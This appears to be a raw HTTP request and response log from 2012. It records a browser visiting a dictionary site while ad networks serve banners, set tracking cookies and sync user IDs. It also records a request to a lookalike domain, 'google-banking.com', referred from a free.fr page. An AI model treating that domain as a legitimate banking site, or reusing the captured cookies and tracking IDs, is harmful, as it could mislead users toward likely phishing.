Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://worddictionary.co.uk/static//inpage-affinity/djs28.html
Cookie: uuid2=5858721859426781856; anj=Kfu=8fG4S]cvjr/?0P(*AuB-u**g1:XIFC`EhzW_u^m(g^zRl1D*rj1#FaDESu.=a*@]FS-Cw9vWNFD')WKrNw+fmn4H2rWK@p7Fl0]o%E&gt;/&gt;?; sess=1; icu=ChIImNsIEAoYAyADKAMwjpDwhAUQjpDwhAUYAg..
HTTP/1.1 200 OK

Content-Type: image/gif
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref=&quot;http://cdn.adnxs.com/w3c/policy/p3p.xml&quot;, CP=&quot;NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE&quot;
X-XSS-Protection: 0
Set-Cookie: uuid2=5858721859426781856; path=/; expires=Wed, 06-Feb-2013 19:29:18 GMT; domain=.adnxs.com; HttpOnly sess=1; path=/; expires=Fri, 09-Nov-2012 19:29:18 GMT; domain=.adnxs.com; HttpOnly uuid2=5858721859426781856; path=/; expires=Wed, 06-Feb-2013 19:29:18 GMT; domain=.adnxs.com; HttpOnly
Content-Length: 43
Date: Thu, 08 Nov 2012 19:29:18 GMT
GET /serve?ms=16384&cb=598335109&aid=9140&eid=27&pp=0.140831&bp=0.140831&ref=http://worddictionary.co.uk/static//inpage-affinity/zsa52.html&click=http://ib.adnxs.com/click?NKmhDcAGwj9IGKtyRjnAPwAAAAAAAPA_SBirckY5wD8zqaENwAbCP9U8wO86DuNAoArzhH1cTlENCJxQAAAAABk1DgA8AQAARwEAAAIAAACEzC4A9pkCAAAAAQBVU0QAVVNEANgCWgB5MAAArTsAAgUCAQUAAIQAsR8m1gAAAAA./cnd=%21rwR_JAiJSRCEmbsBGPazCiAA/referrer=http%3A%2F%2Fworddictionary.co.uk%2Fstatic%2F%2Finpage-affinity%2Fzsa52.html/clickenc= HTTP/1.1

Host: delivery.steelhousemedia.com
GET /serve?ms=16384&amp;cb=598335109&amp;aid=9140&amp;eid=27&amp;pp=0.140831&amp;bp=0.140831&amp;ref=http://worddictionary.co.uk/static//inpage-affinity/zsa52.html&amp;click=http://ib.adnxs.com/click?NKmhDcAGwj9IGKtyRjnAPwAAAAAAAPA_SBirckY5wD8zqaENwAbCP9U8wO86DuNAoArzhH1cTlENCJxQAAAAABk1DgA8AQAARwEAAAIAAACEzC4A9pkCAAAAAQBVU0QAVVNEANgCWgB5MAAArTsAAgUCAQUAAIQAsR8m1gAAAAA./cnd=%21rwR_JAiJSRCEmbsBGPazCiAA/referrer=http%3A%2F%2Fworddictionary.co.uk%2Fstatic%2F%2Finpage-affinity%2Fzsa52.html/clickenc= HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://worddictionary.co.uk/static//inpage-affinity/zsa52.html
HTTP/1.1 200 OK

Content-Type: text/html;charset=UTF-8
P3P: CP=&quot;NON DSP COR NID CURa ADMa DEVa PSAa PSDa OUR STP UNI COM NAV INT STA PRE&quot;
Set-Cookie: guid=13b97b4a-5c30-4b22-88fd-18e7b37dc1bb;Path=/;Domain=.steelhousemedia.com;Expires=Tue, 26-Nov-2080 22:43:25 GMT ccc=;Path=/;Domain=.steelhousemedia.com;Expires=Thu, 08-Nov-2012 19:29:19 GMT view=;Path=/;Domain=.steelhousemedia.com;Expires=Thu, 08-Nov-2012 19:29:19 GMT
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Encoding: gzip
Content-Length: 1832
Connection: close
GET /a.aspx?ZoneID=241&Task=Get&PageID=[timestamp]&SiteID=1&BMPClickURL=http://ib.adnxs.com/click?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAPA_AAAAAAAAAAAAAAAAAAAAAI8jMIONpfkPoArzhH1cTlENCJxQAAAAABg1DgA8AQAAKQQAAAIAAAARnikA9pkCAAAAAABVU0QAVVNEACwB-gB4MAAAa00DAQMCAQUAAIQAixFRIwAAAAA./cnd=%21WwWoLQiRsSAQkbymARj2swogAQ../referrer=http%3A%2F%2Fworddictionary.co.uk%2Fstatic%2F%2Finpage-affinity%2Fdjs28.html/clickenc= HTTP/1.1

Host: ads1.solocpm.com
GET /a.aspx?ZoneID=241&amp;Task=Get&amp;PageID=[timestamp]&amp;SiteID=1&amp;BMPClickURL=http://ib.adnxs.com/click?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAPA_AAAAAAAAAAAAAAAAAAAAAI8jMIONpfkPoArzhH1cTlENCJxQAAAAABg1DgA8AQAAKQQAAAIAAAARnikA9pkCAAAAAABVU0QAVVNEACwB-gB4MAAAa00DAQMCAQUAAIQAixFRIwAAAAA./cnd=%21WwWoLQiRsSAQkbymARj2swogAQ../referrer=http%3A%2F%2Fworddictionary.co.uk%2Fstatic%2F%2Finpage-affinity%2Fdjs28.html/clickenc= HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://ib.adnxs.com/if?enc=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAPA_AAAAAAAAAAAAAAAAAAAAAI8jMIONpfkPoArzhH1cTlENCJxQAAAAABg1DgA8AQAAKQQAAAIAAAARnikA9pkCAAAAAABVU0QAVVNEACwB-gB4MAAAa00AAgMCAQUAAIQAiREsIwAAAAA.&amp;cnd=%21Zh9q2giRsSAQkbymARgAIPazCjAEOPjgCEABSKkIUJjqOFgAYNgGaABwCHj4BIABGIgB-ASQAQGYAQGgAQKoAQCwAQC5AQAAAAAAAAAAwQEAAAAAAAAAAMkBS7lU0As3wz_ZAR-F61G4Huk_4AEA&amp;udj=uf%28%27a%27%2C+40438%2C+1352402958%29%3Buf%28%27c%27%2C+530577%2C+1352402958%29%3Buf%28%27r%27%2C+2727441%2C+1352402958%29%3B&amp;ccd=%21WwWoLQiRsSAQkbymARj2swogAQ..&amp;vpid=46&amp;referrer=http%3A%2F%2Fworddictionary.co.uk%2Fstatic%2F%2Finpage-affinity%2Fdjs28.html&amp;dlo=1
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Cache-Control: private
Server: Microsoft-IIS/7.5
P3P: CP=&quot;NOI DSP COR NID ADMa OTPa OUR NOR&quot;
X-AspNet-Version: 4.0.30319
Set-Cookie: ZoneRefreshThreshold241=Count=1; path=/
X-Powered-By: ASP.NET
Date: Thu, 08 Nov 2012 19:28:50 GMT
Content-Length: 1232
GET /pixel?google_nid=appnexus1&google_sc&google_hm=NTg1ODcyMTg1OTQyNjc4MTg1Ng%3D%3D HTTP/1.1

Host: cm.g.doubleclick.net
GET /pixel?google_nid=appnexus1&amp;google_sc&amp;google_hm=NTg1ODcyMTg1OTQyNjc4MTg1Ng%3D%3D HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://worddictionary.co.uk/static//inpage-affinity/zsa52.html
Cookie: id=223ae1776901005b||t=1350343758|et=730|cs=002213fd480aa30e9cef2f5d42
HTTP/1.1 302 Found

Content-Type: text/html; charset=UTF-8
Location: http://adx.adnxs.com/mapuid?member=181&amp;user=
Date: Thu, 08 Nov 2012 19:29:18 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Server: Cookie Matcher
Content-Length: 245
X-XSS-Protection: 1; mode=block
GET /mapuid?member=181&user= HTTP/1.1

Host: adx.adnxs.com
GET /mapuid?member=181&amp;user= HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://worddictionary.co.uk/static//inpage-affinity/zsa52.html
Cookie: uuid2=5858721859426781856; anj=Kfu=8fG4S]cvjr/?0P(*AuB-u**g1:XIFC`EhzW_u^m(g^zRl1D*rj1#FaDESu.=a*@]FS-Cw9vWNFD')WKrNw+fmn4H2rWK@p7Fl0]o%E&gt;/&gt;?; sess=1; icu=ChIImNsIEAoYAyADKAMwjpDwhAUQjpDwhAUYAg..
HTTP/1.1 200 OK

Content-Type: image/gif
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref=&quot;http://cdn.adnxs.com/w3c/policy/p3p.xml&quot;, CP=&quot;NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE&quot;
X-XSS-Protection: 0
Set-Cookie: uuid2=5858721859426781856; path=/; expires=Wed, 06-Feb-2013 19:29:18 GMT; domain=.adnxs.com; HttpOnly sess=1; path=/; expires=Fri, 09-Nov-2012 19:29:18 GMT; domain=.adnxs.com; HttpOnly uuid2=5858721859426781856; path=/; expires=Wed, 06-Feb-2013 19:29:18 GMT; domain=.adnxs.com; HttpOnly
Content-Length: 43
Date: Thu, 08 Nov 2012 19:29:18 GMT
GET /ppv/?22378469C1204499464 HTTP/1.1

Host: ad.zanox.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://ads1.solocpm.com/a.aspx?ZoneID=241&amp;Task=Get&amp;PageID=[timestamp]&amp;SiteID=1&amp;BMPClickURL=http://ib.adnxs.com/click?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAPA_AAAAAAAAAAAAAAAAAAAAAI8jMIONpfkPoArzhH1cTlENCJxQAAAAABg1DgA8AQAAKQQAAAIAAAARnikA9pkCAAAAAABVU0QAVVNEACwB-gB4MAAAa00DAQMCAQUAAIQAixFRIwAAAAA./cnd=%21WwWoLQiRsSAQkbymARj2swogAQ../referrer=http%3A%2F%2Fworddictionary.co.uk%2Fstatic%2F%2Finpage-affinity%2Fdjs28.html/clickenc=
HTTP/1.1 302 Moved Temporarily

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store
Pragma: no-cache
Content-Length: 0
Location: http://static.no.groupon-content.net/affiliate/restaurant/20110520_no_pizzacoupons_yourcity_bc219_300x250.gif
Server: Microsoft-IIS/7.5
Set-Cookie: zptr=5C95682S1701718959650703360T0; expires=Fri, 08-Nov-2013 19:29:18 GMT; path=/
X-Powered-By: ASP.NET
P3P: policyref=&quot;http://ad.zanox.com/w3c/p3p.xml&quot;, CP=&quot;NOI CUR OUR STP&quot;
Date: Thu, 08 Nov 2012 19:29:18 GMT
Connection: close
GET /imgs/20/20110520_no_pizzacoupons_yourcity_bc219_300x250.jpg HTTP/1.1

Host: ads1.solocpm.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://ads1.solocpm.com/a.aspx?ZoneID=241&amp;Task=Get&amp;PageID=[timestamp]&amp;SiteID=1&amp;BMPClickURL=http://ib.adnxs.com/click?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAPA_AAAAAAAAAAAAAAAAAAAAAI8jMIONpfkPoArzhH1cTlENCJxQAAAAABg1DgA8AQAAKQQAAAIAAAARnikA9pkCAAAAAABVU0QAVVNEACwB-gB4MAAAa00DAQMCAQUAAIQAixFRIwAAAAA./cnd=%21WwWoLQiRsSAQkbymARj2swogAQ../referrer=http%3A%2F%2Fworddictionary.co.uk%2Fstatic%2F%2Finpage-affinity%2Fdjs28.html/clickenc=
Cookie: ZoneRefreshThreshold241=Count=1
HTTP/1.1 200 OK

Content-Type: image/jpeg
Last-Modified: Thu, 02 Aug 2012 08:59:32 GMT
Accept-Ranges: bytes
Etag: &quot;267ce0218d70cd1:0&quot;
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Thu, 08 Nov 2012 19:28:50 GMT
Content-Length: 28840
GET /affiliate/restaurant/20110520_no_pizzacoupons_yourcity_bc219_300x250.gif HTTP/1.1

Host: static.no.groupon-content.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://ads1.solocpm.com/a.aspx?ZoneID=241&amp;Task=Get&amp;PageID=[timestamp]&amp;SiteID=1&amp;BMPClickURL=http://ib.adnxs.com/click?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAPA_AAAAAAAAAAAAAAAAAAAAAI8jMIONpfkPoArzhH1cTlENCJxQAAAAABg1DgA8AQAAKQQAAAIAAAARnikA9pkCAAAAAABVU0QAVVNEACwB-gB4MAAAa00DAQMCAQUAAIQAixFRIwAAAAA./cnd=%21WwWoLQiRsSAQkbymARj2swogAQ../referrer=http%3A%2F%2Fworddictionary.co.uk%2Fstatic%2F%2Finpage-affinity%2Fdjs28.html/clickenc=
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Thu, 08 Nov 2012 19:29:18 GMT
Expires: Thu, 08 Nov 2012 19:42:48 GMT
Last-Modified: Tue, 12 Jul 2011 12:16:02 GMT
Cache-Control: max-age=3600
Etag: &quot;9fed-4a7de43634480&quot;
Accept-Ranges: bytes
Server: Footprint Distributor V4.8
X-Cache: HIT from static.groupon
X-Server: web0801
Vary: Accept-Encoding
Content-Length: 40941
POST / HTTP/1.1

Host: ocsp.verisign.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Length: 115
Content-Type: application/ocsp-request
HTTP/1.0 200 Ok

Content-Type: application/ocsp-response
Last-Modified: Tue, 06 Nov 2012 00:37:37 GMT
Expires: Tue, 13 Nov 2012 00:37:37 GMT
Content-Transfer-Encoding: binary
Content-Length: 1814
Cache-Control: max-age=364099, public, no-transform, must-revalidate
Date: Thu, 08 Nov 2012 19:29:18 GMT
nncoection: close
Connection: Keep-Alive
GET /ad973cfcae0d8e4eaabf8106f14a2672.jpg HTTP/1.1

Host: cdn.steelhousemedia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://worddictionary.co.uk/static//inpage-affinity/knw79.html
Cookie: guid=0f13c904-2dbc-4979-ab54-86512dd92c0f; ccc=; view=
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Thu, 08 Nov 2012 19:29:18 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 22 Oct 2012 20:49:26 GMT
Etag: &quot;26319e-9560-4ccabfd2e8180&quot;
Accept-Ranges: bytes
Content-Length: 38240
Cache-Control: max-age=31536000, public
Expires: Fri, 08 Nov 2013 19:29:18 GMT
Connection: close
test: 1
GET /159e274a4df3b28fd1769dfa249e94c9.jpg HTTP/1.1

Host: cdn.steelhousemedia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://worddictionary.co.uk/static//inpage-affinity/zsa52.html
Cookie: guid=13b97b4a-5c30-4b22-88fd-18e7b37dc1bb; ccc=; view=
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Thu, 08 Nov 2012 19:29:18 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 22 Oct 2012 20:57:24 GMT
Etag: &quot;5a19b5-94bc-4ccac19ac3500&quot;
Accept-Ranges: bytes
Content-Length: 38076
Cache-Control: max-age=31536000, public
Expires: Fri, 08 Nov 2013 19:29:18 GMT
Connection: close
test: 1
GET /fr/u.php?p=391363987594223&m=5858721859426781856 HTTP/1.1

Host: www.facebook.com
GET /fr/u.php?p=391363987594223&amp;m=5858721859426781856 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://worddictionary.co.uk/static//inpage-affinity/knw79.html
HTTP/1.1 200 OK

Content-Type: image/gif
Cache-Control: public, max-age=0
Date: Thu, 08 Nov 2012 11:29:18 PST
Expires: Thu, 08 Nov 2012 11:29:18 PST
Pragma: public
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Encoding: gzip
X-FB-Debug: nX2M4XAOQlpY42BfXyN1P6oeFo9CF6yJ397xmVe0NAs=
Transfer-Encoding: chunked
Connection: keep-alive
GET /tb/v1/theme/fb_bg_sl_l.gif HTTP/1.1

Host: s1.affinitymatrix.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://worddictionary.co.uk/?utm_source=cb&amp;utm_medium=cb&amp;utm_campaign=cb2
HTTP/1.1 200 OK

Content-Type: image/gif
Server: nginx
Date: Thu, 08 Nov 2012 19:29:19 GMT
Content-Length: 707
Last-Modified: Mon, 30 Jan 2012 10:18:39 GMT
Connection: close
Accept-Ranges: bytes
GET /tb/v1/theme/fb_bg_sl_c.gif HTTP/1.1

Host: s1.affinitymatrix.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://worddictionary.co.uk/?utm_source=cb&amp;utm_medium=cb&amp;utm_campaign=cb2
HTTP/1.1 200 OK

Content-Type: image/gif
Server: nginx
Date: Thu, 08 Nov 2012 19:29:19 GMT
Content-Length: 156
Last-Modified: Mon, 30 Jan 2012 10:18:39 GMT
Connection: close
Accept-Ranges: bytes
GET /tb/v1/theme/fb_bg_sl_r.gif HTTP/1.1

Host: s1.affinitymatrix.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://worddictionary.co.uk/?utm_source=cb&amp;utm_medium=cb&amp;utm_campaign=cb2
HTTP/1.1 200 OK

Content-Type: image/gif
Server: nginx
Date: Thu, 08 Nov 2012 19:29:19 GMT
Content-Length: 1025
Last-Modified: Mon, 30 Jan 2012 10:18:39 GMT
Connection: close
Accept-Ranges: bytes
GET /tb/v1/theme/fb_round_x_close.gif HTTP/1.1

Host: s1.affinitymatrix.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://worddictionary.co.uk/?utm_source=cb&amp;utm_medium=cb&amp;utm_campaign=cb2
HTTP/1.1 200 OK

Content-Type: image/gif
Server: nginx
Date: Thu, 08 Nov 2012 19:29:19 GMT
Content-Length: 803
Last-Modified: Mon, 30 Jan 2012 10:18:39 GMT
Connection: close
Accept-Ranges: bytes
GET /tb-v1-log.png?pk=pqi80&pi=238&aui=150&u=http%3A%2F%2Fworddictionary.co.uk%2F%3Futm_source%3Dcb%26utm_medium%3Dcb%26utm_campaign%3Dcb2&h=worddictionary.co.uk&pri=3&ru=http%3A%2F%2Fclicks.affectsearch.com%2Ffly%3Fq%3DSecurity%2BCameras%26enk%3DJrGGuSa5j6GPiY%2BpRrHGoY%2BJZqlGoQaRJ6lG4ybjRg%3D%3D&ari=r3%3A222ffno28509c080c45ad83.35548412&tn=fluid-gray&vp=1159x778&res=1159x1243&am=banner&dim=728x90&pli=2462296&s=worddictionary.co.uk&rt=2&t=D HTTP/1.1

Host: tbn.ph.affinity.com
GET /tb-v1-log.png?pk=pqi80&amp;pi=238&amp;aui=150&amp;u=http%3A%2F%2Fworddictionary.co.uk%2F%3Futm_source%3Dcb%26utm_medium%3Dcb%26utm_campaign%3Dcb2&amp;h=worddictionary.co.uk&amp;pri=3&amp;ru=http%3A%2F%2Fclicks.affectsearch.com%2Ffly%3Fq%3DSecurity%2BCameras%26enk%3DJrGGuSa5j6GPiY%2BpRrHGoY%2BJZqlGoQaRJ6lG4ybjRg%3D%3D&amp;ari=r3%3A222ffno28509c080c45ad83.35548412&amp;tn=fluid-gray&amp;vp=1159x778&amp;res=1159x1243&amp;am=banner&amp;dim=728x90&amp;pli=2462296&amp;s=worddictionary.co.uk&amp;rt=2&amp;t=D HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://worddictionary.co.uk/?utm_source=cb&amp;utm_medium=cb&amp;utm_campaign=cb2
Cookie: PHUU=803093fc02080839d9057141d44daea6; CfP=1; JEB2=509C014D6E651A59D48D8D35F0024347
HTTP/1.1 200 OK

Content-Type: image/png
Server: nginx
Date: Thu, 08 Nov 2012 19:29:18 GMT
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/5.3.6
P3P: CP=&quot;NOI ADM DEV COM NAV OUR STP&quot;
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 01 jan 2012 05:00:00 GMT
GET /favicon.ico HTTP/1.1

Host: worddictionary.co.uk

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: ref=http%3A%2F%2Fclicks.affectsearch.com%2Ffly%3Fq%3DSecurity%2BCameras%26enk%3DJrGGuSa5j6GPiY%2BpRrHGoY%2BJZqlGoQaRJ6lG4ybjRg%3D%3D; __utma=37969189.1263011376.1352402957.1352402957.1352402957.1; __utmb=37969189.1.10.1352402957; __utmc=37969189; __utmz=37969189.1352402957.1.1.utmcsr=cb|utmccn=cb2|utmcmd=cb
HTTP/1.1 200 OK

Content-Type: text/plain; charset=UTF-8
Date: Thu, 08 Nov 2012 19:29:19 GMT
Server: Apache
Last-Modified: Fri, 25 Feb 2011 09:35:42 GMT
Etag: &quot;2fd38-47e-dbb5780&quot;
Accept-Ranges: bytes
Content-Length: 1150
Connection: close
GET /main.php?page=f8a892dc63e25f27 HTTP/1.1

Host: google-banking.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://wegoproject.free.fr/


GET /favicon.ico HTTP/1.1

Host: wegoproject.free.fr

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
HTTP/1.1 200 OK

Content-Type: image/x-icon
Date: Thu, 08 Nov 2012 19:29:11 GMT
Server: Apache/ProXad [Apr 20 2012 15:06:05]
Connection: close
Cache-Control: no-cache, no-store, must-revalidate
GET /favicon.ico HTTP/1.1

Host: wegoproject.free.fr

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
HTTP/1.1 200 OK

Content-Type: image/x-icon
Date: Thu, 08 Nov 2012 19:29:14 GMT
Server: Apache/ProXad [Apr 20 2012 15:06:05]
Connection: close
Cache-Control: no-cache, no-store, must-revalidate
GET /st?plh=http://www.pctools.com/&aid=9140&segment=25off HTTP/1.1

Host: px.steelhousemedia.com
GET /st?plh=http://www.pctools.com/&amp;aid=9140&amp;segment=25off HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://worddictionary.co.uk/static//inpage-affinity/knw79.html
Cookie: guid=0f13c904-2dbc-4979-ab54-86512dd92c0f; ccc=; view=
HTTP/1.1 200 OK

Content-Type: application/javascript;charset=utf-8
Date: Thu, 08 Nov 2012 19:29:18 GMT
Access-Control-Allow-Origin: *
P3P: CP=&quot;NON DSP COR NID CURa ADMa DEVa PSAa PSDa OUR STP UNI COM NAV INT STA PRE&quot;
Set-Cookie: guid=0f13c904-2dbc-4979-ab54-86512dd92c0f;Path=/;Domain=.steelhousemedia.com;Expires=Sat, 01-Nov-2042 19:29:18 GMT tt=&quot;H4sIAAAAAAAAAKtW8guKtzQ0MYg3NTNWsjLUUULiGJsamRgYWZpaGFsa6cAVGhoYmoBVFpdkJmdXeqbEG8YbxRsZKVnllebkoKgzAqtDEjBGETAxMUXlW6KrN0Q4CSyJ6iJk52CRMTbGrQXTe8huxi5jiDNIIDbBHAr2FbLCWgBhgRr8ZgEAAA==&quot;;Path=/;Domain=.px.steelhousemedia.com;Expires=Sat, 01-Nov-2042 19:29:18 GMT
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Encoding: gzip
Connection: close